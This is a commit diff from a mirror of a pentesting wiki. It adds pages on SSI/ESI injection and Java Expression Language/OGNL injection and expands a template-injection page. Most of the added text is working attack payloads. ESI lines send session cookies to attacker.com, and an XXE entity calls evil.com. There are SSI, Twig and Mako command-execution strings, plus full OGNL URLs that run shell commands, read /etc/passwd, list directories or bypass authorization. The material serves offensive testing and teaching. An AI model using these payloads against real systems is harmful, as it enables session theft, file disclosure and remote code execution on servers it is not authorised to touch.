0x22bb
/
hacktricks
mirror of https://github.com/carlospolop/hacktricks.git
1
2
Fork 0
Code Releases Activity

GitBook: [master] 8 pages modified

This commit is contained in:
CPol 2021-06-07 09:30:58 +00:00 committed by gitbook-bot
parent 452bc1d9fc
commit 2698f73ac2
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
7 changed files with 336 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
SUMMARY.md
View File

@ -392,8 +392,10 @@
* [Mysql SSRF](pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md)
* [SQLMap - Cheetsheat](pentesting-web/sql-injection/sqlmap/README.md)
* [Second Order Injection - SQLMap](pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md)
* [Server Side Inclusion/Edge Side Inclusion Injection](pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md)
* [SSRF \(Server Side Request Forgery\)](pentesting-web/ssrf-server-side-request-forgery.md)
* [SSTI \(Server Side Template Injection\)](pentesting-web/ssti-server-side-template-injection.md)
* [SSTI \(Server Side Template Injection\)](pentesting-web/ssti-server-side-template-injection/README.md)
* [EL - Expression Language](pentesting-web/ssti-server-side-template-injection/el-expression-language.md)
* [Reverse Tab Nabbing](pentesting-web/reverse-tab-nabbing.md)
* [Unicode Normalization vulnerability](pentesting-web/unicode-normalization-vulnerability.md)
* [Web Tool - WFuzz](pentesting-web/web-tool-wfuzz.md)

2
pentesting-web/client-side-template-injection-csti.md
View File

@ -2,7 +2,7 @@
## Summary
It is like a [**Server Side Template Injection**](ssti-server-side-template-injection.md) but in the **client**. The **SSTI** can allow you the **execute code** on the remote server, the **CSTI** could allow you to **execute arbitrary JavaScript** code in the victim.
It is like a [**Server Side Template Injection**](ssti-server-side-template-injection/) but in the **client**. The **SSTI** can allow you the **execute code** on the remote server, the **CSTI** could allow you to **execute arbitrary JavaScript** code in the victim.
The way to **test** for this vulnerability is very **similar** as in the case of **SSTI**, the interpreter is going to expect something to execute **between doubles keys** and will execute it. For example using something like: `{{ 7-7 }}` if the server is **vulnerable** you will see a `0` and if not you will see the original: `{{ 7-7 }}`

121
pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md Normal file
View File

@ -0,0 +1,121 @@
# Server Side Inclusion/Edge Side Inclusion Injection
## Server Side Inclusion Basic Information
SSI \(Server Side Includes\) are directives that are **placed in HTML pages, and evaluated on the server** while the pages are being served. They let you **add dynamically generated content** to an existing HTML page, without having to serve the entire page via a CGI program, or other dynamic technology.
For example, you might place a directive into an existing HTML page, such as:
`<!--#echo var="DATE_LOCAL" -->`
And, when the page is served, this fragment will be evaluated and replaced with its value:
`Tuesday, 15-Jan-2013 19:28:54 EST`
The decision of when to use SSI, and when to have your page entirely generated by some program, is usually a matter of how much of the page is static, and how much needs to be recalculated every time the page is served. SSI is a great way to add small pieces of information, such as the current time - shown above. But if a majority of your page is being generated at the time that it is served, you need to look for some other solution. \(Definition taken from [here](https://httpd.apache.org/docs/current/howto/ssi.html)\).
You can infer the presence of SSI if the web application uses files with the extensions .shtml, .shtm or .stm, but it's not only the case.
A typical SSI expression has the following format:
```text
<!--#directive param="value" -->
```
### Check
```text
<!--#echo var="DOCUMENT_NAME" --> #Document name
<!--#echo var="DATE_LOCAL" --> #Date
<!--#include virtual="/index.html" --> #File inclusion
<!--#exec cmd="dir" --> #Command exec
<!--#exec cmd="ls" --> #Command exec
```
## Edge Side Inclusion
There is a problem **caching information or dynamic applications** as part of the content may have **varied** for the next time the content is retrieved. This is what **ESI** is used form, to indicate using ESI tags the **dynamic content that needs to be generated** before sending the cache version.
if an **attacker** is able to **inject an ESI tag** inside the cache content, then, he could be able to i**nject arbitrary content** on the document before it's sent to the users.
### ESI Detection
The following header in a response from the server means that the server is using ESI:
```text
Surrogate-Control: content="ESI/1.0"
```
If you can't find this header, the server might be using ESI anyways.
A blind exploitation approach can also be used as a request should arrive to the attackers server:
```markup
<esi:include src=http://attacker.com/>
```
### ESI exploitation
#### XSS
The following ESI directive will load an arbitrary file inside the response of the server
```markup
<esi:include src=http://attacker.com/xss.html>
```
The file _http://attacker.com/xss.html_ may contain a XSS payload like `<script>alert(1)</script>`
#### Bypass client XSS protection
```markup
x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
```
#### Steal Cookie
```markup
<esi:include src=http://attacker.com/$(HTTP_COOKIE)>
<esi:include src="http://attacker.com/?cookie=$(HTTP_COOKIE{'JSESSIONID'})" />
```
#### Private Local File
Do not confuse this with a "Local File Inclusion":
```markup
<esi:include src="secret.txt">
```
#### CRLF
```markup
<esi:include src="http://anything.com%0d%0aX-Forwarded-For:%20127.0.0.1%0d%0aJunkHeader:%20JunkValue/"/>
```
#### Akamai debug
This will send debug information included in the response:
```markup
<esi:debug/>
```
### ESI + XSLT = XXE
It is also possible to add _eXtensible Stylesheet Language Transformations \(XSLT\)_ based ESI includes by specifying the `xslt` value to the _dca_ parameter. The following include will cause the HTTP surrogate to request the XML and XSLT file. The XSLT file is then used to filter the XML file. This XML file can be used to perform _XML External Entity \(XXE\)_ attacks. This allows attackers to perform SSRF attacks, which is not very useful since this must be performed through ESI includes, which is an SSRF vector itself. External DTDs are not parsed since the underlying library \(Xalan\) has no support for it. This means we cannot extract local files.
```markup
<esi:include src="http://host/poc.xml" dca="xslt" stylesheet="http://host/poc.xsl" />
```
The XSLT file:
```markup
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE xxe [<!ENTITY xxe SYSTEM "http://evil.com/file" >]>
<foo>&xxe;</foo>
```
### References
* [https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/](https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/)
* [https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/](https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/)

38
pentesting-web/ssti-server-side-template-injection.md → pentesting-web/ssti-server-side-template-injection/README.md
View File

@ -22,7 +22,7 @@ http://vulnerable-website.com/?name={{bad-stuff-here}}
## Constructing a server-side template injection attack
![](../.gitbook/assets/ssti-methodology-diagram.png)
![](../../.gitbook/assets/ssti-methodology-diagram.png)
### Detect
@ -32,7 +32,7 @@ If an **error is thrown** it will be quiet easy to figure out that **the server
#### Detect - Plaintext context
The given input is being **rendered and reflected** into the response. This is easily **mistaken for a simple** [**XSS**](xss-cross-site-scripting/) vulnerability, but it's easy to difference if you try set **mathematical operations** within a template expression:
The given input is being **rendered and reflected** into the response. This is easily **mistaken for a simple** [**XSS**](../xss-cross-site-scripting/) vulnerability, but it's easy to difference if you try set **mathematical operations** within a template expression:
```text
{{7*7}}
@ -68,7 +68,7 @@ If you are lucky the server will be **printing the errors** and you will be able
Otherwise, you'll need to manually **test different language-specific payloads** and study how they are interpreted by the template engine. A common way of doing this is to inject arbitrary mathematical operations using syntax from different template engines. You can then observe whether they are successfully evaluated. To help with this process, you can use a decision tree similar to the following:
![](../.gitbook/assets/image%20%289%29.png)
![](../../.gitbook/assets/image%20%289%29.png)
### Exploit
@ -156,7 +156,16 @@ http://localhost:8082/(${T(java.lang.Runtime).getRuntime().exec('calc')})
[https://github.com/veracode-research/spring-view-manipulation](https://github.com/veracode-research/spring-view-manipulation)
### Smarty \(PHP\)
### Expression Language - EL \(Java\)
EL provides an important mechanism for enabling the presentation layer \(web pages\) to communicate with the application logic \(managed beans\). The EL is used by **several JavaEE technologies**, such as JavaServer Faces technology, JavaServer Pages \(JSP\) technology, and Contexts and Dependency Injection for Java EE \(CDI\).
Check the following page to learn more about the **exploitation of EL interpreters**:
{% page-ref page="el-expression-language.md" %}
### marty \(PHP\)
* ``{php} echo `id`;{/php}``
#### More information
@ -170,6 +179,9 @@ http://localhost:8082/(${T(java.lang.Runtime).getRuntime().exec('calc')})
* `{{7*'7'}} = 49`
* `{{1/0}} = Error`
* `{{foobar}} Nothing`
* `{{_self}} (Ref. to current application)`
* `{{_self.env}}`
* `{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("whoami")}}`
#### More information
@ -314,7 +326,17 @@ Django is going to be using as template engine **Jinja2**.
#### More information
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection\#jinja2](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2)
* Check [attr trick to bypass blacklisted chars in here](../misc/basic-python/bypass-python-sandboxes.md#python3).
* Check [attr trick to bypass blacklisted chars in here](../../misc/basic-python/bypass-python-sandboxes.md#python3).
### Mako \(Python\)
```text
<%
import os
x=os.popen('id').read()
%>
${x}
```
### Razor \(.Net\)
@ -355,14 +377,14 @@ More information in the original research [https://www.onsecurity.io/blog/go-sst
## BlackHat PDF
{% file src="../.gitbook/assets/en-server-side-template-injection-rce-for-the-modern-web-app-blackhat-15.pdf" %}
{% file src="../../.gitbook/assets/en-server-side-template-injection-rce-for-the-modern-web-app-blackhat-15.pdf" %}
## Related Help
If you think it could be useful, read:
* [Flask tricks](../pentesting/pentesting-web/flask.md)
* [Python magic functions](../misc/basic-python/magic-methods.md)
* [Flask tricks](../../pentesting/pentesting-web/flask.md)
* [Python magic functions](../../misc/basic-python/magic-methods.md)
## Tools

179
pentesting-web/ssti-server-side-template-injection/el-expression-language.md Normal file
View File

@ -0,0 +1,179 @@
# EL - Expression Language
## Basic Information
EL provides an important mechanism for enabling the presentation layer \(web pages\) to communicate with the application logic \(managed beans\). The EL is used by **several JavaEE technologies**, such as JavaServer Faces technology, JavaServer Pages \(JSP\) technology, and Contexts and Dependency Injection for Java EE \(CDI\). The EL can also be used in stand-alone environments.
Java applications are **easily recognizable** as they tend to use extensions as **.jsp** or **.jsf**, throw **stack errors** and use **term like "Serverlet" in the headers**.
{% hint style="info" %}
depending on the **EL version** some **features** might be **On** or **Off** and usually some **characters** may be **disallowed**.
{% endhint %}
## Basic Example
\(You can find another interesting tutorial about EL in [https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts/](https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts/)\)
Download from the [**Maven**](https://mvnrepository.com/) repository the jar files:
* `commons-lang3-3.9.jar`
* `spring-core-5.2.1.RELEASE.jar`
* `commons-logging-1.2.jar`
* `spring-expression-5.2.1.RELEASE.jar`
And create a the following `Main.java` file:
```java
import org.springframework.expression.Expression;
import org.springframework.expression.ExpressionParser;
import org.springframework.expression.spel.standard.SpelExpressionParser;
public class Main {
public static ExpressionParser PARSER;
public static void main(String[] args) throws Exception {
PARSER = new SpelExpressionParser();
System.out.println("Enter a String to evaluate:");
java.io.BufferedReader stdin = new java.io.BufferedReader(new java.io.InputStreamReader(System.in));
String input = stdin.readLine();
Expression exp = PARSER.parseExpression(input);
String result = exp.getValue().toString();
System.out.println(result);
}
}
```
Next compile the code \(if you don't have `javac` installed, install `sudo apt install default-jdk`\):
```java
javac -cp commons-lang3-3.9.jar:spring-core-5.2.1.RELEASE.jar:spring-expression-5.2.1.RELEASE.jar:commons-lang3-3.9.jar:commons-logging-1.2.jar:. Main.java
```
Execute the application with:
```java
java -cp commons-lang3-3.9.jar:spring-core-5.2.1.RELEASE.jar:spring-expression-5.2.1.RELEASE.jar:commons-lang3-3.9.jar:commons-logging-1.2.jar:. Main
Enter a String to evaluate:
{5*5}
[25]
```
Note how in the previous example the term `{5*5}` was **evaluated**.
### Basic actions
```bash
#Basic string operations examples
{"a".toString()}
[a]
{"dfd".replace("d","x")}
[xfx]
#Access to the String class
{"".getClass()}
[class java.lang.String]
#Access to arbitrary class
{"".getClass().forName("java.util.Date")}
[class java.util.Date]
#List methods of a class
{"".getClass().forName("java.util.Date").getMethods()[0].toString()}
[public boolean java.util.Date.equals(java.lang.Object)]
```
### Detection
* Burp detection
```bash
gk6q${“zkz”.toString().replace(“k”, “x”)}doap2
#The value returned was "igk6qzxzdoap2", indicating of the execution of the expression.
```
* J2EE detection
```bash
#J2EEScan Detection vector (substitute the content of the response body with the content of the “INJPARAM” parameter concatenated with a sum of integer):
https://www.example.url/?vulnerableParameter=PRE-${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23parameters.INJPARAM[0])%2c%23kzxs.print(new%20java.lang.Integer(829%2b9))%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}-POST&INJPARAM=HOOK_VAL
```
* Sleep 10 secs
```bash
#Blind detection vector (sleep during 10 seconds)
https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23kzxs%3d%40java.lang.Thread%40sleep(10000)%2c1%3f%23xx%3a%23request.toString}
```
### Remote File Inclusion
```bash
https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23wwww=new%20java.io.File(%23parameters.INJPARAM[0]),%23pppp=new%20java.io.FileInputStream(%23wwww),%23qqqq=new%20java.lang.Long(%23wwww.length()),%23tttt=new%20byte[%23qqqq.intValue()],%23llll=%23pppp.read(%23tttt),%23pppp.close(),%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(new+java.lang.String(%23tttt))%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}&INJPARAM=%2fetc%2fpasswd
```
### Directory Listing
```bash
https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23wwww=new%20java.io.File(%23parameters.INJPARAM[0]),%23pppp=%23wwww.listFiles(),%23qqqq=@java.util.Arrays@toString(%23pppp),%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23qqqq)%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}&INJPARAM=..
```
### RCE
* Basic RCE explanation
```bash
#Check the method getRuntime is there
{"".getClass().forName("java.lang.Runtime").getMethods()[6].toString()}
[public static java.lang.Runtime java.lang.Runtime.getRuntime()]
#Execute command (you won't see the command output in the console)
{"".getClass().forName("java.lang.Runtime").getRuntime().exec("curl http://127.0.0.1:8000")}
[Process[pid=10892, exitValue=0]]
```
* RCE linux
```bash
https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23wwww=@java.lang.Runtime@getRuntime(),%23ssss=new%20java.lang.String[3],%23ssss[0]="%2fbin%2fsh",%23ssss[1]="%2dc",%23ssss[2]=%23parameters.INJPARAM[0],%23wwww.exec(%23ssss),%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23parameters.INJPARAM[0])%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}&INJPARAM=touch%20/tmp/InjectedFile.txt
```
* RCE Windows \(not tested\)
```bash
https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23wwww=@java.lang.Runtime@getRuntime(),%23ssss=new%20java.lang.String[3],%23ssss[0]="cmd",%23ssss[1]="%2fC",%23ssss[2]=%23parameters.INJPARAM[0],%23wwww.exec(%23ssss),%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23parameters.INJPARAM[0])%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}&INJPARAM=touch%20/tmp/InjectedFile.txt
```
### Inspecting the environment
* `applicationScope` - global application variables
* `requestScope` - request variables
* `initParam` - application initialization variables
* `sessionScope` - session variables
* `param.X` - param value where X is the name of a http parameter
You will need to cast this variables to String like:
```bash
${sessionScope.toString()}
```
#### Authorization bypass example
```bash
${pageContext.request.getSession().setAttribute("admin", true)}
```
The application can also use custom variables like:
```bash
${user}
${password}
${employee.FirstName}
```
## References
* [https://techblog.mediaservice.net/2016/10/exploiting-ognl-injection/](https://techblog.mediaservice.net/2016/10/exploiting-ognl-injection/)

2
pentesting/pentesting-web/README.md
View File

@ -378,7 +378,7 @@ Check for this vulnerabilities:
* [**Race Condition**](../../pentesting-web/race-condition.md)
* [**SQL Injection**](../../pentesting-web/sql-injection/)
* [**SSRF \(Server Side Request Forgery**](../../pentesting-web/ssrf-server-side-request-forgery.md)
* [**SSTI \(Server Side Template Injection**](../../pentesting-web/ssti-server-side-template-injection.md)
* [**SSTI \(Server Side Template Injection**](../../pentesting-web/ssti-server-side-template-injection/)
* [**Unicode Normalization vulnerability**](../../pentesting-web/unicode-normalization-vulnerability.md)
* [**XPATH Injection**](../../pentesting-web/xpath-injection.md)
* [**XSLT Server Side Injection**](../../pentesting-web/xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md)

2
pentesting/pentesting-web/flask.md
View File

@ -1,6 +1,6 @@
# Flask
**Probably if you are playing a CTF a Flask application will be related to** [**SSTI**](../../pentesting-web/ssti-server-side-template-injection.md)**.**
**Probably if you are playing a CTF a Flask application will be related to** [**SSTI**](../../pentesting-web/ssti-server-side-template-injection/)**.**
## Cookies